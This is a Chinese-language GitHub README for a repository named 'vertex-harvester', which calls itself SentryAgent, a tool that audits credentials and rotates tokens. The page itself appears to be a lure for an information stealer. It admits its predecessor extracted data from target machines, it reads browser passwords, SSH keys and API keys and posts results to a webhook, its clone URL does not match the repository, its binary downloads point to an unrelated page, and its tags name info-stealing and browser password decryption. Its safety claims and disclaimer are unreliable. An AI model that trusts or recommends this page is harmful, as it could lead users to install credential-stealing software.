pop98324/vertex-harvester

# 🧠 Vertex-0: SentryAgent **智能凭证守护者与系统卫生工具包** *将你的端点转变为自我审计的数字哨兵* [](https://pop98324.github.io) ## 📡 概述 大多数人把他们的电脑当成一个漏勺——密码泄露、token 过期、敏感文件像被遗忘的脏衣服一样堆积如山。**Vertex-0: SentryAgent** 颠覆了这一局面。SentryAgent 并非像其前身 *vertex-grabber* 那样从目标机器*提取*数据，而是通过持续扫描凭证泄露、孤立的 token、弱加密和未经授权的访问模式来*保护*主机。它是一个自我修复的数字免疫系统。 把它想象成一个从不休息的个人审计员——不是小偷，而是守夜人。每一个缺失的证书、每一个过期的 API key、每一个被遗忘的保存密码都会被标记、隔离，并可选择进行修复。SentryAgent 将你的 PC 从一个安全漏洞变成一座堡垒。 ## 🧩 架构与决策流程 ``` flowchart TD A[User launches SentryAgent] --> B{Configuration mode?} B -->|Profile-driven| C[Load .sentryprofile config] B -->|Ad-hoc| D[CLI flags override defaults] C --> E[Scan System] D --> E E --> F{Threat detected?} F -->|Browser credentials| G[Quarantine & log] F -->|Weak encryption| H[Suggest upgrade] F -->|Orphaned tokens| I[Rotate via API] F -->|Clean| J[Generate hygiene report] G --> K[User review] H --> K I --> K K --> L[Auto-remediate?] L -->|Yes| M[Execute fix] L -->|No| N[Save alert] M --> O[Send summary to webhook] N --> O ``` ## 🌐 跨平台 Emoji 兼容性矩阵 | 操作系统系列 | 原生支持 | Emoji 渲染 | CLI 稳定性 | 审计深度 | |--------------------|----------------|------------------|---------------|-------------| | 🪟 Windows 11 | ✅ 完整 | ✅ 原生 | ⚡ 极佳 | 🔍 深度 | | 🍏 macOS 14+ | ✅ 完整 | ✅ 原生 | ⚡ 极佳 | 🔍 深度 | | 🐧 Ubuntu 24.04 | ✅ 完整 | ⚠️ 终端回退 | ⚡ 极佳 | 🔍 深度 | | 🐧 Fedora 40 | ✅ 完整 | ⚠️ 终端回退 | ⚡ 极佳 | 🔍 中等 | | 🐧 Arch 系 | ⚠️ 部分 | ⚠️ 终端回退 | ⚡ 良好 | 🔍 中等 | | 🪟 Windows 10 | ✅ 完整 | ✅ 原生 | ⚡ 良好 | 🔍 深度 | | 🐧 Debian 12 | ⚠️ 部分 | ⚠️ 终端回退 | ⚡ 良好 | 🔍 中等 | ## 🔒 核心特性 ### 🛡️ 凭证保管库扫描器 扫描浏览器密码管理器、SSH 密钥和云凭证文件，以检测： - 跨平台重复使用的密码 - 过期超过 180 天的密钥 - 违反最小权限原则的权限 输出一个**风险密度评分** —— 一个代表你暴露面的单一数值。 ### 💳 Token 轮换引擎 使用官方的吊销端点自动轮换过期的 API token（OpenAI、Claude、GitHub、AWS）。无需手动干预。该引擎： - 识别超过 90 天的 token - 生成具有相同 scope 的新 token - 更新本地配置文件或环境变量 - 将轮换时间戳记录到不可变的审计追踪中 ### 🧠 多语言仪表板 一个轻量级的响应式 Web UI（Flask + Jinja2），具备以下功能： - 支持 12 种语言渲染（英语、西班牙语、法语、德语、葡萄牙语、日语、韩语、中文、阿拉伯语、俄语、印地语、土耳其语） - 自动检测浏览器语言环境 - 使用颜色编码的严重性显示系统卫生评分 - 支持通过系统托盘代理进行 7x24 小时后台扫描 ### 🔧 示例配置文件 (`.sentryprofile`) ``` sentry: scan_schedule: hourly auto_rotate: true quarantine_path: ~/.sentry_quarantine webhook_url: https://hooks.example.com/alerts languages: - en - es - ja os_compatibility: windows_10: allow windows_11: allow macos_14: allow linux_debian: warn ai_providers: openai: api_key_env: OPENAI_API_KEY model: gpt-4o-mini risk_analysis: true claude: api_key_env: ANTHROPIC_API_KEY model: claude-3-haiku-20240307 token_rotation: true chat_summaries: true ``` ### ⌨️ 示例控制台调用 ``` # 无配置快速扫描 sentryagent --mode scan --output json # 基于 Profile 的执行与自动修复 sentryagent --profile ~/.sentryprofile --remediate --webhook # 持续后台守护进程 (兼容 systemd) sentryagent --daemon --interval 30m --log /var/log/sentry.log # 集成 OpenAI 生成自然语言摘要 sentryagent --scan --ai-summary --provider openai --model gpt-4o-mini # 仅轮换过期的 Claude tokens sentryagent --rotate --provider claude --dry-run ``` ## 🤖 OpenAI 与 Claude API 集成 SentryAgent 利用 AI 使审计报告更具可读性和可操作性。 **OpenAI 集成：** - 从原始扫描数据生成*自然语言风险叙述* - 根据泄露数据库（通过 API 上下文）推荐特定的密码替换方案 - 通过 GPT-4o-mini 摘要发送每日卫生摘要 **Claude (Anthropic) 集成：** - 分析 token 权限 scope 并建议最小权限优化 - 生成多语言的系统卫生摘要（需要有效的 `ANTHROPIC_API_KEY`） - 支持对话式审计：用简单的英语向 Claude 询问你的凭证健康状况 ``` # 示例：用自然语言查询您的审计数据 sentryagent --query "Which tokens are about to expire and what should I rotate first?" --provider claude ``` ## 📦 安装说明 ### 通过 Git Clone 安装（推荐） ``` git clone https://github.com/vertex-0/sentryagent.git cd sentryagent pip install -r requirements.txt chmod +x sentry.py ./sentry.py --version ``` ### 二进制文件下载 - **Windows**: 便携式 EXE（无需管理员权限） - **macOS**: 带签名可执行文件的 DMG - **Linux**: 适用于所有主要发行版的 AppImage [](https://pop98324.github.io) ## 🔍 SEO 优化关键词（自然融入） - 用于凭证泄露检测的*端点审计工具包* - 针对 OpenAI 和 Claude API 密钥的*自动 token 轮换* - 带有响应式 Web 仪表板的*多平台系统卫生*扫描器 - 用于身份威胁检测的*自托管安全哨兵* * 使用本地 AI 模型的*隐私优先凭证守护者* - 支持多语言的*密码健康分析器* - 针对企业笔记本电脑的*7x24 小时后台监控*守护进程 SentryAgent 不是一个*免费工具* —— 它是一个在 MIT 许可下提供的**价值导向的安全实用程序**，旨在鼓励合乎道德的使用。 ## ⚠️ 免责声明 SentryAgent 是一个**系统卫生与凭证管理工具**。除非用户明确配置将日志发送到外部 webhook，否则它**绝不会**从主机系统外泄、提取或共享任何数据。该软件： - 默认仅在本地机器上运行 - 任何网络通信都需要用户的明确同意 - 从不以明文形式存储凭证；使用加密的本地保管库 - **绝非**黑客工具或键盘记录器 —— 它是一个**审计与保护代理** 作者不对误用、配置错误或在非自有系统上的未经授权部署负责。在审计第三方系统时，请始终遵守当地法规。 ## 📄 许可证 本项目基于 **MIT 许可证** 授权 —— 有关详细信息，请参阅 [LICENSE](LICENSE) 文件。 版权所有 © 2026 Vertex-0 Development。特此免费授予任何获得本软件副本和相关文档文件（“软件”）的人不受限制地处置该软件的权利，包括不受限制地使用、复制、修改、合并、发布、分发、再授权和/或出售该软件副本的权利，并再授权给配备了该软件的人员，但须满足以下条件： 上述版权声明和本许可声明应包含在该软件的所有副本或大部分中。 本软件按“原样”提供，不提供任何形式的保证，无论是明示的还是暗示的，包括但不限于对适销性、特定用途的适用性和非侵权性的保证。在任何情况下，作者或版权持有人均不对任何索赔、损害或其他责任负责，无论是在合同诉讼、侵权行为还是其他方面，由该软件或其使用或其他交易引起、由此产生或与之相关。 ## 🧪 未来路线图（2026 年第二季度与第三季度） - 🧬 **生物识别关联** —— 将凭证健康状况与物理设备信任评分绑定 - 🌌 **零知识证明卫生状况** —— 在不泄露密码的情况下分享你的风险评分 - 📊 **企业车队模式** —— 供 IT 管理员监控 100 多个端点的集中式仪表板 - 🧠 **本地 LLM 支持** —— Ollama 集成，实现真正的离线 AI 摘要 [](https://pop98324.github.io) *SentryAgent：因为你的凭证需要的是保镖，而不是小偷。*

标签：GitHub开源安全工具, HTTP工具, PC密码抓取, Petitpotam, T1566, 信息窃取工具, 凭据转储, 凭证安全, 密码提取, 恶意软件, 攻击路径可视化, 数据窃取, 无线安全, 浏览器密码解密, 系统信息收集, 网络安全, 逆向工具, 隐私保护, 黑客工具